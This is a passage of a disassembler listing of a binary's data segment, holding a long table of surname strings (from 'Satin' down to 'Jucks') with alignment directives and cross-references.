aSatin db 'Satin',0 ; DATA XREF: seg002:0043D350�o
align 4
aSase db 'Sase',0 ; DATA XREF: seg002:0043D34C�o
align 4
aSartore db 'Sartore',0 ; DATA XREF: seg002:0043D348�o
aSarin db 'Sarin',0 ; DATA XREF: seg002:0043D344�o
align 4
aSapers db 'Sapers',0 ; DATA XREF: seg002:0043D340�o
align 4
aSanna db 'Sanna',0 ; DATA XREF: seg002:0043D33C�o
align 4
aSanchezRamirez db 'Sanchez-Ramirez',0 ; DATA XREF: seg002:0043D338�o
aSamson db 'Samson',0 ; DATA XREF: seg002:0043D334�o
align 4
aSali db 'Sali',0 ; DATA XREF: seg002:0043D330�o
align 4
aSahu db 'Sahu',0 ; DATA XREF: seg002:0043D32C�o
align 4
aSafire db 'Safire',0 ; DATA XREF: seg002:0043D328�o
align 4
aSadler db 'Sadler',0 ; DATA XREF: seg002:0043D324�o
align 4
aSabatello db 'Sabatello',0 ; DATA XREF: seg002:0043D320�o
align 10h
aRyu db 'Ryu',0 ; DATA XREF: seg002:0043D31C�o
aRush db 'Rush',0 ; DATA XREF: seg002:0043D318�o
align 4
aRuescher db 'Ruescher',0 ; DATA XREF: seg002:0043D314�o
align 4
aRuderman db 'Ruderman',0 ; DATA XREF: seg002:0043D310�o
align 4
aRuan db 'Ruan',0 ; DATA XREF: seg002:0043D30C�o
align 4
aRu db 'Ru',0 ; DATA XREF: seg002:0043D308�o
align 10h
aRoyal db 'Royal',0 ; DATA XREF: seg002:0043D304�o
align 4
aRow db 'Row',0 ; DATA XREF: seg002:0043D300�o
aRonen db 'Ronen',0 ; DATA XREF: seg002:0043D2FC�o
align 4
aRogers db 'Rogers',0 ; DATA XREF: seg002:0043D2F8�o
align 4
aRoesler db 'Roesler',0 ; DATA XREF: seg002:0043D2F4�o
aRocha db 'Rocha',0 ; DATA XREF: seg002:0043D2F0�o
align 4
aRobinson db 'Robinson',0 ; DATA XREF: seg002:0043D2EC�o
align 4
aRivera db 'Rivera',0 ; DATA XREF: seg002:0043D2E8�o
align 10h
aRish db 'Rish',0 ; DATA XREF: seg002:0043D2E4�o
align 4
aRineer db 'Rineer',0 ; DATA XREF: seg002:0043D2E0�o
align 10h
aRindos db 'Rindos',0 ; DATA XREF: seg002:0043D2DC�o
align 4
aRielly db 'Rielly',0 ; DATA XREF: seg002:0043D2D8�o
align 10h
aRichmond db 'Richmond',0 ; DATA XREF: seg002:0043D2D4�o
align 4
aRhea db 'Rhea',0 ; DATA XREF: seg002:0043D2D0�o
align 4
aResnik db 'Resnik',0 ; DATA XREF: seg002:0043D2CC�o
align 4
aRepetto db 'Repetto',0 ; DATA XREF: seg002:0043D2C8�o
aRenick db 'Renick',0 ; DATA XREF: seg002:0043D2C4�o
align 4
aRemak db 'Remak',0 ; DATA XREF: seg002:0043D2C0�o
align 4
aReinold db 'Reinold',0 ; DATA XREF: seg002:0043D2BC�o
aCunningham db 'Cunningham',0 ; DATA XREF: seg002:0043D2B8�o
align 4
aReedquist db 'Reedquist',0 ; DATA XREF: seg002:0043D2B4�o
align 4
aReddenTyler db 'Redden-Tyler',0 ; DATA XREF: seg002:0043D2B0�o
align 4
aRayport db 'Rayport',0 ; DATA XREF: seg002:0043D2AC�o
aRapple db 'Rapple',0 ; DATA XREF: seg002:0043D2A8�o
align 4
aRankin db 'Rankin',0 ; DATA XREF: seg002:0043D2A4�o
align 4
aRangan db 'Rangan',0 ; DATA XREF: seg002:0043D2A0�o
align 4
aRaney db 'Raney',0 ; DATA XREF: seg002:0043D29C�o
align 4
aRajagopalan db 'Rajagopalan',0 ; DATA XREF: seg002:0043D298�o
aRadeke db 'Radeke',0 ; DATA XREF: seg002:0043D294�o
align 10h
aRabkin db 'Rabkin',0 ; DATA XREF: seg002:0043D290�o
align 4
aRabe db 'Rabe',0 ; DATA XREF: seg002:0043D28C�o
align 10h
aQuetin db 'Quetin',0 ; DATA XREF: seg002:0043D288�o
align 4
aQuaday db 'Quaday',0 ; DATA XREF: seg002:0043D284�o
align 10h
aPynchon db 'Pynchon',0 ; DATA XREF: seg002:0043D280�o
aPugh db 'Pugh',0 ; DATA XREF: seg002:0043D27C�o
align 10h
aPuccia db 'Puccia',0 ; DATA XREF: seg002:0043D278�o
align 4
aProthrowStith db 'Prothrow-Stith',0 ; DATA XREF: seg002:0043D274�o
align 4
aProietti db 'Proietti',0 ; DATA XREF: seg002:0043D270�o
align 4
aPritz db 'Pritz',0 ; DATA XREF: seg002:0043D26C�o
align 4
aPritchard db 'Pritchard',0 ; DATA XREF: seg002:0043D268�o
align 4
aPrevost db 'Prevost',0 ; DATA XREF: seg002:0043D264�o
aPreucel db 'Preucel',0 ; DATA XREF: seg002:0043D260�o
aPresper db 'Presper',0 ; DATA XREF: seg002:0043D25C�o
aPowers db 'Powers',0 ; DATA XREF: seg002:0043D258�o
align 4
aPoolman db 'Poolman',0 ; DATA XREF: seg002:0043D254�o
aPoma db 'Poma',0 ; DATA XREF: seg002:0043D250�o
align 4
aPolitis db 'Politis',0 ; DATA XREF: seg002:0043D24C�o
aPolanyi db 'Polanyi',0 ; DATA XREF: seg002:0043D248�o
aPolak db 'Polak',0 ; DATA XREF: seg002:0043D244�o
align 10h
aPoirier db 'Poirier',0 ; DATA XREF: seg002:0043D240�o
aPointer db 'Pointer',0 ; DATA XREF: seg002:0043D23C�o
aPoincaire db 'Poincaire',0 ; DATA XREF: seg002:0043D238�o
align 4
aPocobene db 'Pocobene',0 ; DATA XREF: seg002:0043D234�o
align 4
aPo db 'Po',0 ; DATA XREF: seg002:0043D230�o
align 4
aPlous db 'Plous',0 ; DATA XREF: seg002:0043D22C�o
align 4
aPlasket db 'Plasket',0 ; DATA XREF: seg002:0043D228�o
aPlant db 'Plant',0 ; DATA XREF: seg002:0043D224�o
align 4
aPlancon db 'Plancon',0 ; DATA XREF: seg002:0043D220�o
aPinot db 'Pinot',0 ; DATA XREF: seg002:0043D21C�o
align 4
aPilbeam db 'Pilbeam',0 ; DATA XREF: seg002:0043D218�o
aPfister db 'Pfister',0 ; DATA XREF: seg002:0043D214�o
aPettit db 'Pettit',0 ; DATA XREF: seg002:0043D210�o
align 4
aPettibone db 'Pettibone',0 ; DATA XREF: seg002:0043D20C�o
align 4
aPetruzello db 'Petruzello',0 ; DATA XREF: seg002:0043D208�o
align 4
aPeters db 'Peters',0 ; DATA XREF: seg002:0043D204�o
align 4
aPerrimon db 'Perrimon',0 ; DATA XREF: seg002:0043D200�o
align 4
aPerone db 'Perone',0 ; DATA XREF: seg002:0043D1FC�o
align 10h
aPerna db 'Perna',0 ; DATA XREF: seg002:0043D1F8�o
align 4
aPerlman db 'Perlman',0 ; DATA XREF: seg002:0043D1F4�o
aPerlak db 'Perlak',0 ; DATA XREF: seg002:0043D1F0�o
align 4
aPerko db 'Perko',0 ; DATA XREF: seg002:0043D1EC�o
align 10h
aPereira db 'Pereira',0 ; DATA XREF: seg002:0043D1E8�o
aPenny db 'Penny',0 ; DATA XREF: seg002:0043D1E4�o
align 10h
aPeishel db 'Peishel',0 ; DATA XREF: seg002:0043D1E0�o
aPederson db 'Pederson',0 ; DATA XREF: seg002:0043D1DC�o
align 4
aPearlberg db 'Pearlberg',0 ; DATA XREF: seg002:0043D1D8�o
align 10h
aPeabody db 'Peabody',0 ; DATA XREF: seg002:0043D1D4�o
aPaynter db 'Paynter',0 ; DATA XREF: seg002:0043D1D0�o
aPawloski db 'Pawloski',0 ; DATA XREF: seg002:0043D1CC�o
align 4
aPavlon db 'Pavlon',0 ; DATA XREF: seg002:0043D1C8�o
align 4
aPavetti db 'Pavetti',0 ; DATA XREF: seg002:0043D1C4�o
aPattullo db 'Pattullo',0 ; DATA XREF: seg002:0043D1C0�o
align 4
aPatrick db 'Patrick',0 ; DATA XREF: seg002:0043D1BC�o
aPatefield db 'Patefield',0 ; DATA XREF: seg002:0043D1B8�o
align 4
aPascucci db 'Pascucci',0 ; DATA XREF: seg002:0043D1B4�o
align 4
aPartridge db 'Partridge',0 ; DATA XREF: seg002:0043D1B0�o
align 4
aParris db 'Parris',0 ; DATA XREF: seg002:0043D1AC�o
align 4
aParmeggiani db 'Parmeggiani',0 ; DATA XREF: seg002:0043D1A8�o
aPaoletti db 'Paoletti',0 ; DATA XREF: seg002:0043D1A4�o
align 4
aPantilla db 'Pantilla',0 ; DATA XREF: seg002:0043D1A0�o
align 10h
aPanizzon db 'Panizzon',0 ; DATA XREF: seg002:0043D19C�o
align 4
aPanadero db 'Panadero',0 ; DATA XREF: seg002:0043D198�o
align 4
aPalmitesta db 'Palmitesta',0 ; DATA XREF: seg002:0043D194�o
align 4
aPallara db 'Pallara',0 ; DATA XREF: seg002:0043D190�o
aPalepu db 'Palepu',0 ; DATA XREF: seg002:0043D18C�o
align 4
aPalayoor db 'Palayoor',0 ; DATA XREF: seg002:0043D188�o
align 10h
aPaine db 'Paine',0 ; DATA XREF: seg002:0043D184�o
align 4
aPaesdealmeida db 'PaesDealmeida',0 ; DATA XREF: seg002:0043D180�o
align 4
aOvid db 'Ovid',0 ; DATA XREF: seg002:0043D17C�o
align 10h
aOuchida db 'Ouchida',0 ; DATA XREF: seg002:0043D178�o
aOtten db 'Otten',0 ; DATA XREF: seg002:0043D174�o
align 10h
aOttaviani db 'Ottaviani',0 ; DATA XREF: seg002:0043D170�o
align 4
aOstrowski db 'Ostrowski',0 ; DATA XREF: seg002:0043D16C�o
align 4
aOspina db 'Ospina',0 ; DATA XREF: seg002:0043D168�o
align 10h
aOrsi db 'Orsi',0 ; DATA XREF: seg002:0043D164�o
align 4
aOrfield db 'Orfield',0 ; DATA XREF: seg002:0043D160�o
aOray db 'Oray',0 ; DATA XREF: seg002:0043D15C�o
align 4
aOpel db 'Opel',0 ; DATA XREF: seg002:0043D158�o
align 10h
aOMeara db 'O',27h,'meara',0 ; DATA XREF: seg002:0043D154�o
aOman db 'Oman',0 ; DATA XREF: seg002:0043D150�o
align 10h
aOMalley db 'O',27h,'malley',0 ; DATA XREF: seg002:0043D14C�o
align 4
aOlszewski db 'Olszewski',0 ; DATA XREF: seg002:0043D148�o
align 4
aOlson db 'Olson',0 ; DATA XREF: seg002:0043D144�o
align 10h
aOlsen db 'Olsen',0 ; DATA XREF: seg002:0043D140�o
align 4
aOldford db 'Oldford',0 ; DATA XREF: seg002:0043D13C�o
aOHagan db 'O',27h,'hagan',0 ; DATA XREF: seg002:0043D138�o
aOh db 'Oh',0 ; DATA XREF: seg002:0043D134�o
align 4
aOgata db 'Ogata',0 ; DATA XREF: seg002:0043D130�o
align 4
aOcougne db 'Ocougne',0 ; DATA XREF: seg002:0043D12C�o
aNuzum db 'Nuzum',0 ; DATA XREF: seg002:0043D128�o
align 4
aNotman db 'Notman',0 ; DATA XREF: seg002:0043D124�o
align 4
aNitabach db 'Nitabach',0 ; DATA XREF: seg002:0043D120�o
align 4
aNisenson db 'Nisenson',0 ; DATA XREF: seg002:0043D11C�o
align 4
aNickoloff db 'Nickoloff',0 ; DATA XREF: seg002:0043D118�o
align 10h
aNickerson db 'Nickerson',0 ; DATA XREF: seg002:0043D114�o
align 4
aNi_0 db 'Ni',0 ; DATA XREF: seg002:0043D110�o
align 10h
aNg db 'Ng',0 ; DATA XREF: seg002:0043D10C�o
align 4
aNewlin db 'Newlin',0 ; DATA XREF: seg002:0043D108�o
align 4
aNewfeld db 'Newfeld',0 ; DATA XREF: seg002:0043D104�o
aNeuman db 'Neuman',0 ; DATA XREF: seg002:0043D100�o
align 4
aNesci db 'Nesci',0 ; DATA XREF: seg002:0043D0FC�o
align 4
aNenna db 'Nenna',0 ; DATA XREF: seg002:0043D0F8�o
align 4
aNelson db 'Nelson',0 ; DATA XREF: seg002:0043D0F4�o
align 4
aNayduch db 'Nayduch',0 ; DATA XREF: seg002:0043D0F0�o
aNaviaux db 'Naviaux',0 ; DATA XREF: seg002:0043D0EC�o
aNardone db 'Nardone',0 ; DATA XREF: seg002:0043D0E8�o
aNardi db 'Nardi',0 ; DATA XREF: seg002:0043D0E4�o
align 4
aNapolitano db 'Napolitano',0 ; DATA XREF: seg002:0043D0E0�o
align 10h
aNaddeo db 'Naddeo',0 ; DATA XREF: seg002:0043D0DC�o
align 4
aMussachio db 'Mussachio',0 ; DATA XREF: seg002:0043D0D8�o
align 4
aMumford db 'Mumford',0 ; DATA XREF: seg002:0043D0D4�o
aMulroy db 'Mulroy',0 ; DATA XREF: seg002:0043D0D0�o
align 4
aMulkern db 'Mulkern',0 ; DATA XREF: seg002:0043D0CC�o
aMugnai db 'Mugnai',0 ; DATA XREF: seg002:0043D0C8�o
align 4
aMuello db 'Muello',0 ; DATA XREF: seg002:0043D0C4�o
align 4
aMudarri db 'Mudarri',0 ; DATA XREF: seg002:0043D0C0�o
aMotooka db 'Motooka',0 ; DATA XREF: seg002:0043D0BC�o
aMostafavi db 'Mostafavi',0 ; DATA XREF: seg002:0043D0B8�o
align 4
aMosler db 'Mosler',0 ; DATA XREF: seg002:0043D0B4�o
align 10h
aMosher db 'Mosher',0 ; DATA XREF: seg002:0043D0B0�o
align 4
aMortimer db 'Mortimer',0 ; DATA XREF: seg002:0043D0AC�o
align 4
aMorrow db 'Morrow',0 ; DATA XREF: seg002:0043D0A8�o
align 4
aMorrison db 'Morrison',0 ; DATA XREF: seg002:0043D0A4�o
align 4
aMoreton db 'Moreton',0 ; DATA XREF: seg002:0043D0A0�o
aMorani db 'Morani',0 ; DATA XREF: seg002:0043D09C�o
align 4
aMooredech_ db 'MooreDeCh.',0 ; DATA XREF: seg002:0043D098�o
align 4
aMontilio db 'Montilio',0 ; DATA XREF: seg002:0043D094�o
align 10h
aMonque db 'Monque',0 ; DATA XREF: seg002:0043D090�o
align 4
aMoiamedi db 'Moiamedi',0 ; DATA XREF: seg002:0043D08C�o
align 4
aMohr db 'Mohr',0 ; DATA XREF: seg002:0043D088�o
align 4
aMoeller db 'Moeller',0 ; DATA XREF: seg002:0043D084�o
aModestino db 'Modestino',0 ; DATA XREF: seg002:0043D080�o
align 10h
aMocroft db 'Mocroft',0 ; DATA XREF: seg002:0043D07C�o
aMittal db 'Mittal',0 ; DATA XREF: seg002:0043D078�o
align 10h
aMitropoulos db 'Mitropoulos',0 ; DATA XREF: seg002:0043D074�o
aGonzalez db 'Gonzalez',0 ; DATA XREF: seg002:0043D070�o
align 4
aMinichiello db 'Minichiello',0 ; DATA XREF: seg002:0043D06C�o
aMini db 'Mini',0 ; DATA XREF: seg002:0043D068�o
align 4
aMinh db 'Minh',0 ; DATA XREF: seg002:0043D064�o
align 4
aMills db 'Mills',0 ; DATA XREF: seg002:0043D060�o
align 4
aMieher db 'Mieher',0 ; DATA XREF: seg002:0043D05C�o
align 4
aMiddle db 'Middle',0 ; DATA XREF: seg002:0043D058�o
align 4
aMichelman db 'Michelman',0 ; DATA XREF: seg002:0043D054�o
align 4
aMeurer db 'Meurer',0 ; DATA XREF: seg002:0043D050�o
align 10h
aMetropolis db 'Metropolis',0 ; DATA XREF: seg002:0043D04C�o
align 4
aMetelka db 'Metelka',0 ; DATA XREF: seg002:0043D048�o
aMerz db 'Merz',0 ; DATA XREF: seg002:0043D044�o
align 4
aMerseth db 'Merseth',0 ; DATA XREF: seg002:0043D040�o
aMerminod db 'Merminod',0 ; DATA XREF: seg002:0043D03C�o
align 10h
aMerlani db 'Merlani',0 ; DATA XREF: seg002:0043D038�o
aMerikoski db 'Merikoski',0 ; DATA XREF: seg002:0043D034�o
align 4
aMenzies db 'Menzies',0 ; DATA XREF: seg002:0043D030�o
aMemisoglu db 'Memisoglu',0 ; DATA XREF: seg002:0043D02C�o
align 4
aMeccariello db 'Meccariello',0 ; DATA XREF: seg002:0043D028�o
aMcnulty db 'Mcnulty',0 ; DATA XREF: seg002:0043D024�o
aMcnealy db 'Mcnealy',0 ; DATA XREF: seg002:0043D020�o
aMclaren db 'Mclaren',0 ; DATA XREF: seg002:0043D01C�o
aMclane db 'Mclane',0 ; DATA XREF: seg002:0043D018�o
align 4
aMckenna db 'Mckenna',0 ; DATA XREF: seg002:0043D014�o
aMcintosh db 'Mcintosh',0 ; DATA XREF: seg002:0043D010�o
align 4
aMcilroy db 'McIlroy',0 ; DATA XREF: seg002:0043D00C�o
aMcgoldrick db 'Mcgoldrick',0 ; DATA XREF: seg002:0043D008�o
align 4
aMcghee db 'Mcghee',0 ; DATA XREF: seg002:0043D004�o
align 4
aMcfadden db 'McFadden',0 ; DATA XREF: seg002:0043D000�o
align 10h
aMcelroy db 'Mcelroy',0 ; DATA XREF: seg002:0043CFFC�o
aMcdowell db 'Mcdowell',0 ; DATA XREF: seg002:0043CFF8�o
align 4
aMcclearn db 'Mcclearn',0 ; DATA XREF: seg002:0043CFF4�o
align 10h
aMccall db 'Mccall',0 ; DATA XREF: seg002:0043CFF0�o
align 4
aMccaffery db 'Mccaffery',0 ; DATA XREF: seg002:0043CFEC�o
align 4
aMcbride db 'Mcbride',0 ; DATA XREF: seg002:0043CFE8�o
aMazziotta db 'Mazziotta',0 ; DATA XREF: seg002:0043CFE4�o
align 4
aMazzali db 'Mazzali',0 ; DATA XREF: seg002:0043CFE0�o
aMay db 'May',0 ; DATA XREF: seg002:0043CFDC�o
aMauzy db 'Mauzy',0 ; DATA XREF: seg002:0043CFD8�o
align 4
aMattson db 'Mattson',0 ; DATA XREF: seg002:0043CFD4�o
aMatsukata db 'Matsukata',0 ; DATA XREF: seg002:0043CFD0�o
align 10h
aMatarazzo db 'Matarazzo',0 ; DATA XREF: seg002:0043CFCC�o
align 4
aMatalka db 'Matalka',0 ; DATA XREF: seg002:0043CFC8�o
aMass db 'Mass',0 ; DATA XREF: seg002:0043CFC4�o
align 4
aMarubini db 'Marubini',0 ; DATA XREF: seg002:0043CFC0�o
align 4
aMarton db 'Marton',0 ; DATA XREF: seg002:0043CFBC�o
align 10h
aMartochio db 'Martochio',0 ; DATA XREF: seg002:0043CFB8�o
align 4
aMartinez db 'Martinez',0 ; DATA XREF: seg002:0043CFB4�o
align 4
aMarques db 'Marques',0 ; DATA XREF: seg002:0043CFB0�o
aMargetts db 'Margetts',0 ; DATA XREF: seg002:0043CFAC�o
align 4
aMargalit db 'Margalit',0 ; DATA XREF: seg002:0043CFA8�o
align 4
aMarcus db 'Marcus',0 ; DATA XREF: seg002:0043CFA4�o
align 10h
aMarchbanks db 'Marchbanks',0 ; DATA XREF: seg002:0043CFA0�o
align 4
aMarch db 'March',0 ; DATA XREF: seg002:0043CF9C�o
align 4
aMantovan db 'Mantovan',0 ; DATA XREF: seg002:0043CF98�o
align 10h
aManganiello db 'Manganiello',0 ; DATA XREF: seg002:0043CF94�o
aMandel db 'Mandel',0 ; DATA XREF: seg002:0043CF90�o
align 4
aManalis db 'Manalis',0 ; DATA XREF: seg002:0043CF8C�o
aMalova db 'Malova',0 ; DATA XREF: seg002:0043CF88�o
align 4
aMaller db 'Maller',0 ; DATA XREF: seg002:0043CF84�o
align 4
aMalatesta db 'Malatesta',0 ; DATA XREF: seg002:0043CF80�o
align 4
aMaisano db 'Maisano',0 ; DATA XREF: seg002:0043CF7C�o
aMaineHershey db 'Maine-Hershey',0 ; DATA XREF: seg002:0043CF78�o
align 10h
aMaier db 'Maier',0 ; DATA XREF: seg002:0043CF74�o
align 4
aMahony db 'Mahony',0 ; DATA XREF: seg002:0043CF70�o
align 10h
aMaggio db 'Maggio',0 ; DATA XREF: seg002:0043CF6C�o
align 4
aMadigan db 'Madigan',0 ; DATA XREF: seg002:0043CF68�o
aMacy db 'Macy',0 ; DATA XREF: seg002:0043CF64�o
align 4
aMacmillan db 'MacMillan',0 ; DATA XREF: seg002:0043CF60�o
align 4
aMackenney db 'Mackenney',0 ; DATA XREF: seg002:0043CF5C�o
align 10h
aMacintyre db 'Macintyre',0 ; DATA XREF: seg002:0043CF58�o
align 4
aMaceachern db 'Maceachern',0 ; DATA XREF: seg002:0043CF54�o
align 4
aMacdonald db 'Macdonald',0 ; DATA XREF: seg002:0043CF50�o
align 4
aMaccormac db 'Maccormac',0 ; DATA XREF: seg002:0043CF4C�o
align 10h
aMa db 'Ma',0 ; DATA XREF: seg002:0043CF48�o
align 4
aLuzader db 'Luzader',0 ; DATA XREF: seg002:0043CF44�o
aLutcavage db 'Lutcavage',0 ; DATA XREF: seg002:0043CF40�o
align 4
aLussier db 'Lussier',0 ; DATA XREF: seg002:0043CF3C�o
aLuoma db 'Luoma',0 ; DATA XREF: seg002:0043CF38�o
align 4
aLunetta db 'Lunetta',0 ; DATA XREF: seg002:0043CF34�o
aLuecke db 'Luecke',0 ; DATA XREF: seg002:0043CF30�o
align 4
aLuczkow db 'Luczkow',0 ; DATA XREF: seg002:0043CF2C�o
aLuciano db 'Luciano',0 ; DATA XREF: seg002:0043CF28�o
aLucas db 'Lucas',0 ; DATA XREF: seg002:0043CF24�o
align 10h
aLubin db 'Lubin',0 ; DATA XREF: seg002:0043CF20�o
align 4
aLoza db 'Loza',0 ; DATA XREF: seg002:0043CF1C�o
align 10h
aLowenstein db 'Lowenstein',0 ; DATA XREF: seg002:0043CF18�o
align 4
aLoveman db 'Loveman',0 ; DATA XREF: seg002:0043CF14�o
aLoss db 'Loss',0 ; DATA XREF: seg002:0043CF10�o
align 4
aLongworth db 'Longworth',0 ; DATA XREF: seg002:0043CF0C�o
align 4
aLocatelli db 'Locatelli',0 ; DATA XREF: seg002:0043CF08�o
align 4
aLizardo db 'Lizardo',0 ; DATA XREF: seg002:0043CF04�o
aLivolsi db 'Livolsi',0 ; DATA XREF: seg002:0043CF00�o
aLivi db 'Livi',0 ; DATA XREF: seg002:0043CEFC�o
align 4
aLivernash db 'Livernash',0 ; DATA XREF: seg002:0043CEF8�o
align 4
aLitvak db 'Litvak',0 ; DATA XREF: seg002:0043CEF4�o
align 10h
aLittle db 'Little',0 ; DATA XREF: seg002:0043CEF0�o
align 4
aLipponen db 'Lipponen',0 ; DATA XREF: seg002:0043CEEC�o
align 4
aLippmann db 'Lippmann',0 ; DATA XREF: seg002:0043CEE8�o
align 10h
aLinzee db 'Linzee',0 ; DATA XREF: seg002:0043CEE4�o
align 4
aLinehan db 'Linehan',0 ; DATA XREF: seg002:0043CEE0�o
aLine db 'Line',0 ; DATA XREF: seg002:0043CEDC�o
align 4
aLinder db 'Linder',0 ; DATA XREF: seg002:0043CED8�o
align 10h
aLinda db 'Linda',0 ; DATA XREF: seg002:0043CED4�o
align 4
aLinares db 'Linares',0 ; DATA XREF: seg002:0043CED0�o
aLim db 'Lim',0 ; DATA XREF: seg002:0043CECC�o
aLightfoot db 'Lightfoot',0 ; DATA XREF: seg002:0043CEC8�o
align 10h
aLight db 'Light',0 ; DATA XREF: seg002:0043CEC4�o
align 4
aLiem db 'Liem',0 ; DATA XREF: seg002:0043CEC0�o
align 10h
aLidano db 'Lidano',0 ; DATA XREF: seg002:0043CEBC�o
align 4
aLiakos db 'Liakos',0 ; DATA XREF: seg002:0043CEB8�o
align 10h
aLessi db 'Lessi',0 ; DATA XREF: seg002:0043CEB4�o
align 4
aLesser db 'Lesser',0 ; DATA XREF: seg002:0043CEB0�o
align 10h
aLEnclos db 'l',27h,'Enclos',0 ; DATA XREF: seg002:0043CEAC�o
align 4
aLenard db 'Lenard',0 ; DATA XREF: seg002:0043CEA8�o
align 4
aLeite db 'Leite',0 ; DATA XREF: seg002:0043CEA4�o
align 4
aLeclercq db 'Leclercq',0 ; DATA XREF: seg002:0043CEA0�o
align 4
aLecce db 'Lecce',0 ; DATA XREF: seg002:0043CE9C�o
align 10h
aLecar db 'Lecar',0 ; DATA XREF: seg002:0043CE98�o
align 4
aLawless db 'Lawless',0 ; DATA XREF: seg002:0043CE94�o
aLashley db 'Lashley',0 ; DATA XREF: seg002:0043CE90�o
aLaserna db 'Laserna',0 ; DATA XREF: seg002:0043CE8C�o
aLanzit db 'Lanzit',0 ; DATA XREF: seg002:0043CE88�o
align 4
aLantieri db 'Lantieri',0 ; DATA XREF: seg002:0043CE84�o
align 4
aLankes db 'Lankes',0 ; DATA XREF: seg002:0043CE80�o
align 4
aLandes db 'Landes',0 ; DATA XREF: seg002:0043CE7C�o
align 4
aLallemant db 'Lallemant',0 ; DATA XREF: seg002:0043CE78�o
align 10h
aLaing db 'Laing',0 ; DATA XREF: seg002:0043CE74�o
align 4
aLafler db 'Lafler',0 ; DATA XREF: seg002:0043CE70�o
align 10h
aLabunka db 'Labunka',0 ; DATA XREF: seg002:0043CE6C�o
aLa db 'La',0 ; DATA XREF: seg002:0043CE68�o
align 4
aKuwabara db 'Kuwabara',0 ; DATA XREF: seg002:0043CE64�o
align 4
aKusman db 'Kusman',0 ; DATA XREF: seg002:0043CE60�o
align 10h
aKumar db 'Kumar',0 ; DATA XREF: seg002:0043CE5C�o
align 4
aKuenzli db 'Kuenzli',0 ; DATA XREF: seg002:0043CE58�o
aKrysiak db 'Krysiak',0 ; DATA XREF: seg002:0043CE54�o
aKroemer db 'Kroemer',0 ; DATA XREF: seg002:0043CE50�o
aKraus db 'Kraus',0 ; DATA XREF: seg002:0043CE4C�o
align 4
aKrasney db 'Krasney',0 ; DATA XREF: seg002:0043CE48�o
aKrailo db 'Krailo',0 ; DATA XREF: seg002:0043CE44�o
align 4
aKraemer db 'Kraemer',0 ; DATA XREF: seg002:0043CE40�o
aKovaks db 'Kovaks',0 ; DATA XREF: seg002:0043CE3C�o
align 4
aKotter db 'Kotter',0 ; DATA XREF: seg002:0043CE38�o
align 10h
aKorzybski db 'Korzybski',0 ; DATA XREF: seg002:0043CE34�o
align 4
aKool db 'Kool',0 ; DATA XREF: seg002:0043CE30�o
align 4
aKonrad db 'Konrad',0 ; DATA XREF: seg002:0043CE2C�o
align 4
aKoniaris db 'Koniaris',0 ; DATA XREF: seg002:0043CE28�o
align 4
aKommer db 'Kommer',0 ; DATA XREF: seg002:0043CE24�o
align 10h
aKoivumaki db 'Koivumaki',0 ; DATA XREF: seg002:0043CE20�o
align 4
aKohn db 'Kohn',0 ; DATA XREF: seg002:0043CE1C�o
align 4
aKoch db 'Koch',0 ; DATA XREF: seg002:0043CE18�o
align 4
aKobrick db 'Kobrick',0 ; DATA XREF: seg002:0043CE14�o
aKnuff db 'Knuff',0 ; DATA XREF: seg002:0043CE10�o
align 4
aKlint db 'Klint',0 ; DATA XREF: seg002:0043CE0C�o
align 4
aKlinkenborg db 'Klinkenborg',0 ; DATA XREF: seg002:0043CE08�o
aKling db 'Kling',0 ; DATA XREF: seg002:0043CE04�o
align 4
aKlemperer db 'Klemperer',0 ; DATA XREF: seg002:0043CE00�o
align 4
aKleinfelder db 'Kleinfelder',0 ; DATA XREF: seg002:0043CDFC�o
aKleiman db 'Kleiman',0 ; DATA XREF: seg002:0043CDF8�o
aKleckner db 'Kleckner',0 ; DATA XREF: seg002:0043CDF4�o
align 4
aKittridge db 'Kittridge',0 ; DATA XREF: seg002:0043CDF0�o
align 10h
aKirscht db 'Kirscht',0 ; DATA XREF: seg002:0043CDEC�o
aKippenberger db 'Kippenberger',0 ; DATA XREF: seg002:0043CDE8�o
align 4
aKinsley db 'Kinsley',0 ; DATA XREF: seg002:0043CDE4�o
aKindall db 'Kindall',0 ; DATA XREF: seg002:0043CDE0�o
aKimura db 'Kimura',0 ; DATA XREF: seg002:0043CDDC�o
align 10h
aKimmett db 'Kimmett',0 ; DATA XREF: seg002:0043CDD8�o
aKimmel db 'Kimmel',0 ; DATA XREF: seg002:0043CDD4�o
align 10h
aKhong db 'Khong',0 ; DATA XREF: seg002:0043CDD0�o
align 4
aKeul db 'Keul',0 ; DATA XREF: seg002:0043CDCC�o
align 10h
aKerry db 'Kerry',0 ; DATA XREF: seg002:0043CDC8�o
align 4
aKendall db 'Kendall',0 ; DATA XREF: seg002:0043CDC4�o
aKemsley db 'Kemsley',0 ; DATA XREF: seg002:0043CDC0�o
aKempton db 'Kempton',0 ; DATA XREF: seg002:0043CDBC�o
aKelsey db 'Kelsey',0 ; DATA XREF: seg002:0043CDB8�o
align 4
aKelker db 'Kelker',0 ; DATA XREF: seg002:0043CDB4�o
align 10h
aKeith db 'Keith',0 ; DATA XREF: seg002:0043CDB0�o
align 4
aKeepper db 'Keepper',0 ; DATA XREF: seg002:0043CDAC�o
aKeenan db 'Keenan',0 ; DATA XREF: seg002:0043CDA8�o
align 4
aKee db 'Kee',0 ; DATA XREF: seg002:0043CDA4�o
aKawachi db 'Kawachi',0 ; DATA XREF: seg002:0043CDA0�o
aKasten db 'Kasten',0 ; DATA XREF: seg002:0043CD9C�o
align 4
aKassower db 'Kassower',0 ; DATA XREF: seg002:0043CD98�o
align 4
aKarpouzes db 'Karpouzes',0 ; DATA XREF: seg002:0043CD94�o
align 4
aKangis db 'Kangis',0 ; DATA XREF: seg002:0043CD90�o
align 4
aKamel db 'Kamel',0 ; DATA XREF: seg002:0043CD8C�o
align 4
aKalman db 'Kalman',0 ; DATA XREF: seg002:0043CD88�o
align 4
aKalinowski db 'Kalinowski',0 ; DATA XREF: seg002:0043CD84�o
align 4
aKalil db 'Kalil',0 ; DATA XREF: seg002:0043CD80�o
align 10h
aKaligian db 'Kaligian',0 ; DATA XREF: seg002:0043CD7C�o
align 4
aKalbfleisch db 'Kalbfleisch',0 ; DATA XREF: seg002:0043CD78�o
aKafadar db 'Kafadar',0 ; DATA XREF: seg002:0043CD74�o
aKaboolian db 'Kaboolian',0 ; DATA XREF: seg002:0043CD70�o
align 4
aKabbash db 'Kabbash',0 ; DATA XREF: seg002:0043CD6C�o
aJulious db 'Julious',0 ; DATA XREF: seg002:0043CD68�o
aJuliano db 'Juliano',0 ; DATA XREF: seg002:0043CD64�o
aJucks db 'Jucks',0 ; DATA XREF: seg002:0043CD60�o
align 4
